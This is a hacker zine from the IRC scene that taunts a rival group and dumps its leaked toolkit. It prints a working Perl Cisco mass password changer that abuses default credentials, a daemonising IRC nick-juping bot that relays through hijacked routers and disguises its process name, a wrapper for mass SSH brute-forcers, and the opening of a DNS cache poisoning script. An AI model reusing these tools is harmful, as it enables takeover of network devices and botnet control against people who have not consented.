#!/local/efnet/el8/pokemon/requers ################################################ ### x0x0x x0x0x x0x0x x0x0x x0x0x x0x0x ### ### x0x0x x0x0x x0x0x x0x0x x0x0x x0x0x ### ### x0x0x x0x0x x0x0x x0x0x x0x0x x0x0x ### ################################################ # # # # # ÛÛÛÛ ÛÛÛÛ # # ÛÛ± ÛÛ ÛÛ± ÛÛ² # # ÛÛÛ ÛÛ ±ÛÛ ±Û° °ÛÛ ÛÛ ÛÛ ±ÛÛ °ÛÛ ÛÛ° # # ÛÛ²ÛÛ ²ÛÛ °Û² °Û²ÛÛ ÛÛ °ÛÛ °Û²ÛÛ° # # ÛÛÛ ²ÛÛ °Û± ÛÛÛ ÛÛ °ÛÛ ÛÛÛ # # °ÛÛÛ± ±ÛÛ ±Û° ÛÛÛ± ÛÛ ±ÛÛ ÛÛÛ± # # ÛÛ°ÛÛ ÛÛ± ÛÛ ²Û°ÛÛ ÛÛ± ÛÛÛ ²Û°ÛÛ² # # ÛÛ² ÛÛ ÛÛÛÛ ²Û² ÛÛ ÛÛÛÛ ²Û² ÛÛ² # # # ################################################ # # # .: first zine :. # # # # [ tribute to efnet el8 requers ] # # # #<><><><><><><><><><><><><><><><><><><><><><><># # # # -= always keeping the secret identify =- # # # #<><><><><><><><><><><><><><><><><><><><><><><># , .::. in efnet el8 PokeMon .;:**' AMC ` 0 .:XHHHHk. db. .;;. dH MX 0 oMMMMMMMMMMM ~MM dMMP :MMMMMR MMM MR ~MRMN QMMMMMb "MMX MMMMMMP !MX' :M~ MMM MMM .oo. XMMM 'MMM `MMMM. )M> :X!Hk. MMMM XMM.o" . MMMMMMM X?XMMM MMM>!MMP 'MMMb.dM! XM M'?M MMMMMX.`MMMMMMMM~ MM MMM XM `" MX MMXXMM ~MMMMM~ XMM. .XM XM`"MMMb.~*?**~ .MMX M t MMbooMM XMMMMMP ?MMM> YMMMMMM! MM `?MMRb. `""" !L"MMMMM XM IMMM MMMX "MMMM" MM ~%: !Mh.""" dMI IMMP 'MMM. IMX ~M!M IMP . 1n7r0 . The Reason.... .. .. 1º. W3 4r3 71r3d 70 533 p4ck375 k1dd135 4nd p30pl3 1f f1nd1n9 70 h4ck3r f0r 7h3r3! .. W3 d3c1d3 7h3n 70 3574bl15h x0x0x, w17h 1n73n710n 0f h4ck 7h3s3 "r3qu3r5" 4nd p057 z1n35 0n 7h3m, d1vul91n9 17'5 b3l0n91n95. ///////////////// /// Lets play! // ///////////////// <<<<<<<<<< Okay... positive! Geting some tools of LABSEC............................. >>>>>>>>>> -> We get all tools about labsec in different boxs and compact in just one .tar.gz, -> and now we will check all files and tools, and show to universe. -> KEEEEEEEEEEEEEEEPING LABSEC EL8 POKEMON!!! ~\-> wget http://myhost.com/labsec.tar.gz --14:07:59-- http://myhost.com/labsec.tar.gz => `labsec.tar.gz' Resolving myhost.com... x0x0x, x0x0x Connecting to myhost.com|x0x0x|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 51,708,710 (49M) [application/x-gzip] 100%[=================================================================================================================>] 48,708,710 1.06M/s ETA 00:00 14:11:42 (1.09 MB/s) - `labsec.tar.gz' saved [48708710/48708710] ~\-> tar -xzvf labsec.tar.gz >> /dev/null & ~\-> cd labsec; ls ./ bit/ dnscp.py ifstat-1.1.tar.gz lol man.tgz monoxide3/ newnick.tgz osshchan/ ../ brute/ dtb* imp* lotus.c mcd* monoxide3.tar.gz openssh-4.4p1/ osshchan.tar.gz ans/ bt.tgz ettercap-NG-0.7.3/ l* lpd/ mcd.c mosdef/ openssh-4.4p1.tgz shells artpack.tgz ciscos/ ettercap-NG-0.7.3.tar.gz labsec-shells lpd.tar.gz metasploit.tar.gz ms3/ openssh-4.7p1/ zlib.4* asc/ cl* flw.c lab.tar.gz manm/ mit.edu newnick-8.4b/ openssh-4.7p1.tar.gz ~\-> cd ans;ls ./ ../ 00-dc.ans 01-duff.ans 01-labsec.ans 01-labsec-t.ans 01-naipe.ans 01-rhythm.ans 02-naipe.ans ~\-> cat 01-labsec.ans ÜÜÜÜ ÜÜÜÜ ÜÛÛ ÜÛß ÜÜÜÜ ÜÛÜÜÜÜÜ Ü ß ÛÛ ÜÜÜÜÜ ÛÛ Û ÛÛÜÜÜ ÛÛ ÛÛÛÛ ÛÛ ÜÜÜÛÛ ÛÛ Û ÛÛÜÜÜÜÜ Ü ÜÜÜÜ ÛÛ ÛÛÛÛÛ ÛÛ ÛÛ ÛÛßÛÛßßÛ ÛÛÛÛ ÛÛ ÛÛ Û ÛÛÛ ÛÛÛÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛÛÛÛÛ ÛÛÜÜÜÛÛÛ ÛÛÛÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ Û ÛÛ ÛÛÜÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛÛ ßßßßßÛß ßßßß ßßßßÛ ßßßß ÛÛÜÛÛß ßÛÜÜß ßßß ßßßßßßß ßßßßß (((((ELEEEEEEEEEEEEET POKEMON))))) CHECKING BITORNARDO ~\-> cat bst|more #!/usr/bin/env python # Written by Bram Cohen # see LICENSE.txt for license information from BitTornado import PSYCO if PSYCO.psyco: try: import psyco assert psyco.__version__ >= 0x010100f0 psyco.full() except: pass from BitTornado.download_bt1 import BT1Download, defaults, parse_params, get_usage, get_response from BitTornado.RawServer import RawServer, UPnP_ERROR from random import seed from socket import error as socketerror from BitTornado.bencode import bencode from BitTornado.natpunch import UPnP_test from threading import Event from os.path import abspath from sys import argv, version, stdout import sys from sha import sha from time import strftime from BitTornado.clock import clock from BitTornado import createPeerID from BitTornado.ConfigDir import ConfigDir assert version >= '2', "Install Python 2.0 or greater" try: True except: True = 1 False = 0 PROFILER = False def hours(n): if n == 0: return 'complete!' try: n = int(n) assert n >= 0 and n < 5184000 # 60 days except: return '' m, s = divmod(n, 60) h, m = divmod(m, 60) if h > 0: return '%d hour %02d min %02d sec' % (h, m, s) else: return '%d min %02d sec' % (m, s) class HeadlessDisplayer: def __init__(self): self.done = False self.file = '' self.percentDone = '' self.timeEst = '' self.downloadTo = '' self.downRate = '' self.upRate = '' self.shareRating = '' self.seedStatus = '' self.peerStatus = '' self.errors = [] self.last_update_time = -1 def finished(self): self.done = True self.percentDone = '100' self.timeEst = 'Download Succeeded!' self.downRate = '' self.display() def failed(self): self.done = True self.percentDone = '0' self.timeEst = 'Download Failed!' self.downRate = '' self.display() def error(self, errormsg): self.errors.append(errormsg) self.display() def display(self, fractionDone = None, timeEst = None, downRate = None, upRate = None, activity = None, statistics = None, **kws): if self.last_update_time + 0.1 > clock() and fractionDone not in (0.0, 1.0) and activity is not None: return self.last_update_time = clock() if fractionDone is not None: self.percentDone = str(float(int(fractionDone * 1000)) / 10) if timeEst is not None: self.timeEst = hours(timeEst) if activity is not None and not self.done: self.timeEst = activity if downRate is not None: self.downRate = '%.1f kB/s' % (float(downRate) / (1 << 10)) if upRate is not None: self.upRate = '%.1f kB/s' % (float(upRate) / (1 << 10)) if statistics is not None: if (statistics.shareRating < 0) or (statistics.shareRating > 100): self.shareRating = 'oo (%.1f MB up / %.1f MB down)' % (float(statistics.upTotal) / (1<<20), float(statistics.downTotal) / (1<<20)) else: self.shareRating = '%.3f (%.1f MB up / %.1f MB down)' % (statistics.shareRating, float(statistics.upTotal) / (1<<20), float(statistics.downTo tal) / (1<<20)) if not self.done: self.seedStatus = '%d seen now, plus %.3f distributed copies' % (statistics.numSeeds,0.001*int(1000*statistics.numCopies)) else: self.seedStatus = '%d seen recently, plus %.3f distributed copies' % (statistics.numOldSeeds,0.001*int(1000*statistics.numCopies)) self.peerStatus = '%d seen now, %.1f%% done at %.1f kB/s' % (statistics.numPeers,statistics.percentDone,float(statistics.torrentRate) / (1 << 10)) print '\n\n\n\n' for err in self.errors: print 'ERROR:\n' + err + '\n' print 'saving: ', self.file print 'percent done: ', self.percentDone print 'time left: ', self.timeEst print 'download to: ', self.downloadTo print 'download rate: ', self.downRate print 'upload rate: ', self.upRate print 'share rating: ', self.shareRating print 'seed status: ', self.seedStatus print 'peer status: ', self.peerStatus stdout.flush() def chooseFile(self, default, size, saveas, dir): self.file = '%s (%.1f MB)' % (default, float(size) / (1 << 20)) if saveas != '': default = saveas self.downloadTo = abspath(default) return default def newpath(self, path): self.downloadTo = path def run(params): try: import curses curses.initscr() cols = curses.COLS curses.endwin() except: cols = 80 h = HeadlessDisplayer() while 1: configdir = ConfigDir('downloadheadless') defaultsToIgnore = ['responsefile', 'url', 'priority'] configdir.setDefaults(defaults,defaultsToIgnore) configdefaults = configdir.loadConfig() defaults.append(('save_options',0, "whether to save the current options as the new default configuration " + "(only for btdownloadheadless.py)")) try: config = parse_params(params, configdefaults) except ValueError, e: print 'error: ' + str(e) + '\nrun with no args for parameter explanations' break if not config: print get_usage(defaults, 80, configdefaults) break if config['save_options']: configdir.saveConfig(config) ................................................ ................................................ ................................................ ...................BIG CODE..................... ................................................ ................................................ ............. we will share this complete code!! ~\-> cd brute; ls ./ ../ br2/ br2.tar.gz host.pl locaweb/ locaweb.tar.gz ~\-> cd br2;ls ./ sshb103* sshb116* sshb129* sshb141* sshb154* sshb167* sshb18* sshb192* sshb205* sshb33* sshb46* sshb59* sshb71* sshb84* sshb97* ../ sshb104* sshb117* sshb13* sshb142* sshb155* sshb168* sshb180* sshb193* sshb206* sshb34* sshb47* sshb6* sshb72* sshb85* sshb98* all* sshb105* sshb118* sshb130* sshb143* sshb156* sshb169* sshb181* sshb194* sshb21* sshb35* sshb48* sshb60* sshb73* sshb86* sshb99* duh.sh sshb106* sshb119* sshb131* sshb144* sshb157* sshb17* sshb182* sshb195* sshb22* sshb36* sshb49* sshb61* sshb74* sshb87* orb* sshb107* sshb12* sshb132* sshb145* sshb158* sshb170* sshb183* sshb196* sshb23* sshb37* sshb5* sshb62* sshb75* sshb88* ptscan.dat sshb108* sshb120* sshb133* sshb146* sshb159* sshb171* sshb184* sshb197* sshb24* sshb38* sshb50* sshb63* sshb76* sshb89* sc* sshb109* sshb121* sshb134* sshb147* sshb16* sshb172* sshb185* sshb198* sshb25* sshb39* sshb51* sshb64* sshb77* sshb9* ss* sshb11* sshb122* sshb135* sshb148* sshb160* sshb173* sshb186* sshb199* sshb26* sshb4* sshb52* sshb65* sshb78* sshb90* sshb0* sshb110* sshb123* sshb136* sshb149* sshb161* sshb174* sshb187* sshb2* sshb27* sshb40* sshb53* sshb66* sshb79* sshb91* sshb1* sshb111* sshb124* sshb137* sshb15* sshb162* sshb175* sshb188* sshb20* sshb28* sshb41* sshb54* sshb67* sshb8* sshb92* sshb10* sshb112* sshb125* sshb138* sshb150* sshb163* sshb176* sshb189* sshb201* sshb29* sshb42* sshb55* sshb68* sshb80* sshb93* sshb100* sshb113* sshb126* sshb139* sshb151* sshb164* sshb177* sshb19* sshb202* sshb3* sshb43* sshb56* sshb69* sshb81* sshb94* sshb101* sshb114* sshb127* sshb14* sshb152* sshb165* sshb178* sshb190* sshb203* sshb30* sshb44* sshb57* sshb7* sshb82* sshb95* sshb102* sshb115* sshb128* sshb140* sshb153* sshb166* sshb179* sshb191* sshb204* sshb31* sshb45* sshb58* sshb70* sshb83* sshb96* // ripped bruteforce ~\-> cat duh.sh #!/bin/sh # SHELLSCRIPT PARA FAZER O XUPETA SSH RODA JeRAL # CODADO POR klux@efnet klux@LABSEC echo "Escreva o nome do arquivo: " read file; echo "Escreva a quantidade de arquivos: " read qtidade; echo "Arquivo xupeta pra roda jeral flw: " read nomeresult; for ((d=1 ; d <= $qtidade; d++)); do echo "./$file$d" -brute '$1' >> $nomeresult ; done (((((((((((((( OFMGGGGGG GOOOOOOOOOOOOOOOOOD CODE MAN!!! LOLLLLLLL )))))))))))))) ~\-> cd ../ciscos;ls ./ ../ ciscos.txt lep.pl names.txt pressure2.pl pressure.pl readme servers.txt ~\-> cat lep.pl #!/usr/bin/perl # # LEPARKOUR I by labsec@efnet (LsC) # CISCO/ROUTER MASS PASSWD CHANGER # use Net::Telnet::Cisco; # usar em background: 0 # usar em foreground: 1 # um mostra as coisas na tela(1) e o outro nao(0) eh isso e ja era use constant DEBUG => 1; # senha cisco padrao my $padrao = "cisco"; # senha cisco para alterar my $mudar = "cisco"; # nao mexer my $i = 0; my $deu = 0; my $ARGC = @ARGV; my $banner = "\nLEPARKOUR I. by LsC [CISCO/ROUTER MASS PASSWD CHANGER]\n"; if ($ARGC !=1) { print $banner; print "Usage: $0 [list.txt]\n\n"; exit; } print $banner; open ("arq", "$ARGV[0]") or die("[LABSEC] $ARGV[0] nao encontrado\n"); @linhas = (); foreach $linha (@linhas) { chomp(@linhas); if (DEBUG == 1) { print "\n[+] Tentando $linha:23 ($i/$#linhas)\n"; } if (my $session = Net::Telnet::Cisco->new(Host => $linha, Timeout => '5', Errmode => "return")) { $session->errmode("return"); if ($session->login(Password => $padrao, Timeout => '5')) { if (DEBUG == 1) { print "[+] Aceito a senha..\n"; } if ($session->enable($padrao)) { $session->cmd('configure terminal'); $session->cmd('line vty 0 4'); $session->cmd('password '.$mudar); $session->cmd('exit'); $session->cmd('exit'); my @out = $session->cmd('copy run start'); # $session->cmd('startup-config'); foreach (@out) { if ($_ =~ /OK/ig) { if (DEBUG == 1) { print "[+] >> $linha:23 deu certo manow\n"; } system("echo ".$linha." >> alterados.txt"); $deu++; } } } else { if (DEBUG == 1) { print "[-] Erro (enable): Senha errada?\n"; } $erro++; } } else { if (DEBUG == 1) { print "[-] Erro: Senha padrao errada?\n"; } $erro++; } $session->close; } else { if (DEBUG == 1) { print "[-] Erro: Cisco offline.\n"; } $erro++; } $i++; } close("arq"); if (DEBUG == 1) { print qq~\nFim! Total de ciscos com senhas alteradas: $deu Total de ciscos com erro de senha no enable: $erro\n~; } ======= === For this reason this is a el8 pokemon group!!!! === Check the next lame kid code.. LOLLLLLLLLLLLLLL ======= ~\-> cat pressure2.pl #!/usr/bin/perl # [LsC] pressure # [LsC] cisco+irc juper # beta 1 # i dont want kids ripping, so im gonna use perl2exe. # by klux $SIG{HUP} = 'IGNORE'; $SIG{PS} = 'IGNORE'; $SIG{TERM} = 'IGNORE'; $SIG{CHLD} = sub { wait; }; $ARGC=@ARGV; my $pid = fork(); die "ERROR: I could not fork() the process." unless defined($pid); exit if $pid; if ($ARGC !=1) { print "PRESSURE I. by LsC [CISCO/ROUTER JupeNet - IRC Nick Juper]\n"; print "LICENSED and CONFIGURED to: klux\n"; print "Usage: pressure [target]\n"; print " names.txt \n"; print " ciscos.txt \n"; print " servers.txt \n"; print "PRESSURE is private, if you want pressure, #lsc at efnet.\n"; exit(1); } my $senha="reef666"; my $port="6667"; my $chan="#lala"; my $senhachan="rem"; my $owner= "klux"; my $procname="proftpd: [IDLE]"; $0 = $procname . "\0"; $target = $ARGV[0] if ($ARGV[0]); $id ="$ident".int rand(20); $0 = $procname . "\0"; $chan = '#'.$chan if ($chan !~ /^\#/); $nick = retorna_nomes(); $nick2 = retorna_ident(); $cisco = retorna_ciscos(); $server = retorna_servers(); $name = retorna_realn(); $ident = retorna_ident(); $nick3 = "$nick".int rand(20); $nick4 = "$nick2".int rand(20); use IO::Socket; $sock=IO::Socket::INET->new(Proto=>"tcp", PeerAddr=> $cisco, PeerPort=> 23); print $sock "".$senha."\n"; print $sock "telnet ".$server." ".$port."\n"; print $sock "NICK ".$nick."\n"; print $sock "USER ".$ident." LsC LsC :".$name."\n"; while (<$sock>) { print; if (/^:.+?\s433\s/) { # nick already in use print $sock "NICK ".$nick4."\n"; } if (/^:.+?\s376\s/) { # end of motd print $sock "PRIVMSG ".$owner." : [LsC] PRESSURE : connected to $server:$port\n"; print $sock "PRIVMSG ".$owner." : [LsC] TARGET : pointed to $target\n"; print $sock "PRIVMSG ".$owner." : [LsC] !HELP : for help\n"; print $sock "JOIN ".$chan." ".$senhachan." : ENTRANDO NO CANAL\n"; } if(/^PING :(.*)/){ #replying the ping print $sock "PONG :$1\n"; } if(/^\:$owner!.*\@.*PRIVMSG.*:!raw (.*)/){ print $sock "$1"; } if(/^\:$owner!.*\@.*PRIVMSG.*:!help(.*)/){ print $sock "PRIVMSG ".$owner." : [LsC] !RAW\n"; print $sock "PRIVMSG ".$owner." : [LsC] !MSG\n"; print $sock "PRIVMSG ".$owner." : [LsC] !OWNER : nick\n"; print $sock "PRIVMSG ".$owner." : [LsC] !TARGET : nick\n"; print $sock "PRIVMSG ".$owner." : [LsC] !QUIT\n"; print $sock "PRIVMSG ".$owner." : [LsC] !STATS\n"; } if(/^\:$owner!.*\@.*PRIVMSG.*:!msg(.*)/){ print $sock "PRIVMSG ".$1." : ".$2."\n"; } if(/^\:$target!.*\@.*QUIT.*(.*)/){ print $sock "NICK ".$target."\n"; print $sock "PRIVMSG ".$owner." :[LsC] TARGET has been taken.\n"; } if(/^\:$target!.*\@.*NICK.*(.*)/){ print $sock "NICK ".$target."\n"; print $sock "PRIVMSG ".$owner." :[LsC] TARGET has been taken.\n"; } if(/^ERROR :(.*)/){ print $sock "telnet ".$server." ".$port."\n"; print $sock "NICK ".$nick."\n"; print $sock "USER ".$ident." LsC LsC : ".$name."\n"; } if(/^\:$owner!.*\@.*PRIVMSG.*:!quit(.*)/){ die "[LsC] ultimate jupe teknology\n"; } if(/^\:.*: Connection timed out(.*)/){ print STDOUT "[LsC] CONNECTION timed out (DDOS?). Reconnecting\n"; print $sock "telnet ".$server." ".$port."\n"; print $sock "NICK ".$nick."\n"; print $sock "USER ".$id." LsC LsC : ".$name."\n"; print $sock "PRIVMSG ".$owner." : [LsC] CONNECTION has timed out... DDOS ? r3r3r3"; } if(/^\:$owner!.*\@.*PRIVMSG.*:!stats(.*)/){ print $sock "PRIVMSG ".$owner." :[LsC] PRESSURE Stats\n"; print $sock "PRIVMSG ".$owner." :[LsC] SERVER : $server\n"; print $sock "PRIVMSG ".$owner." :[LsC] PORT : $port\n"; print $sock "PRIVMSG ".$owner." :[LsC] TARGET : $target\n"; print $sock "PRIVMSG ".$owner." :[LsC] OWNER : $owner\n"; print $sock "PRIVMSG ".$chan." :[LsC] TARGET is $target\n"; } if( /^\:$owner!.*\@.*\s+PRIVMSG.*:!target\s+(.*)/ ){ $target =$1; $target =~ s/ //; $target =~ s/\r$//; $target =~ s/\n$//; print $sock "PRIVMSG ".$owner." :[LsC] TARGET : pointed to $target\n"; } if(/^\:$secc!.*\@.*PRIVMSG.*:!escap(.*)/){ print $sock "$1"; } if(/^\:$target!.*\@.*\s+QUIT\s+/){ print $sock "NICK $target\n"; } if( /^\:$owner!.*\@.*\s+PRIVMSG.*:!owner\s+(.*)/ ){ $owner =$1; $owner =~ s/ //; $owner =~ s/\r$//; $owner =~ s/\n$//; print $sock "PRIVMSG ".$owner." :[LsC] PRESSURE\n"; print $sock "PRIVMSG ".$owner." :[LsC] TRY !HELP\n"; } } sub retorna_nomes { open (a, "names.txt") or die("[LsC] names.txt not found\n"); @linhas = (); chomp(@linhas); $n = int(rand(@linhas)); close(a); return @linhas[$n]; } sub retorna_ciscos { open (a, "ciscos.txt") or die("[LsC] ciscos.txt not found\n"); @linhas = (); chomp(@linhas); $n = int(rand(@linhas)); close(a); return @linhas[$n]; } sub retorna_servers { open (a, "servers.txt") or die("[LsC] servers.txt not found\n"); @linhas = (); chomp(@linhas); $n = int(rand(@linhas)); close(a); return @linhas[$n]; } sub retorna_realn { open (a, "names.txt") or die("[LsC] names.txt not found\n"); @linhas = (); chomp(@linhas); $n = int(rand(@linhas)); close(a); return @linhas[$n]; } sub retorna_ident { open (a, "names.txt") or die("[LsC] names.txt not found\n"); @linhas = (); chomp(@linhas); $n = int(rand(@linhas)); close(a); return @linhas[$n]; } ******************************************************** *************** NAMED EXPLOIT !?!?!?!? ***************** ******************************************************** \-> cat dnscp.py #!/usr/bin/env python """ DNS Cache Poison v0.3beta by posedge / Coromputer http://www.coromputer.net/ based on the Amit Klein paper: http://www.trusteer.com/docs/bind9dns.html output: